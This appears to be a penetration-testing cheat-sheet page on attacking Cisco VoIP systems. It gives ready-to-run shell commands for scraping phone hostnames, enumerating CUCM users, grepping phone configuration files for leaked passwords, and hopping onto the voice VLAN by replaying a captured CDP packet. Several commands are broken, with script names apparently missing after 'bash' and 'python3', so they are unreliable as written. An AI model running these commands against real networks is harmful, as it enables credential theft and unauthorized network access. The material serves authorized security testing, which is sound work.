Session Initiation Protocol / Voice over IP

Cisco IP Phones

Scrap Cisco IP Phone web interfaces by IPs to get the corresponding host names:

$ for i in `cat phones_ip.txt`; do curl -s http://$i | grep -oP 'SEP[A-Z0-9]+' | uniq | tee -a phones.txt; done

Enumerate usernames on a Cisco CUCM server:

$ bash CUCM01.megacorp.local
$ python3 -H CUCM01.megacorp.local --userenum
$ curl -sk 'https://cucm01.megacorp.local:8443/cucm-uds/users?lastName=' | grep -oP '<firstName>.*?</firstName><lastName>.*?</lastName>' | sort -u | tee cucm_users.txt

Enumerate credential leaks on Cisco IP Phones:

$ python3 -nA -c CUCM01.megacorp.local -l phones.txt
$ for i in `cat phones.txt`; do curl -s http://cucm01.megacorp.local:6970/$i.cnf.xml | grep -i pass; done

VLAN Hopping on Cisco Voice

Capture the first CDP advertisement while plugged through the phone:

$ sudo tcpdump -s 0 -w cdp-packet.cap -c 1 -ni eth0 ether host 01:00:0c:cc:cc:cc
$ sudo tcpdump -vr cdp-packet.cap

Relay it once a minute to simulate a legit phone device:

$ sudo watch -n 60 "tcpreplay -i eth0 cdp-packet.cap"

Configure a sub-interface to access the voice VLAN:

$ sudo vconfig add eth0 1337
$ sudo ifconfig eth0.1337 up
$ sudo dhclient -v eth0.1337

Last updated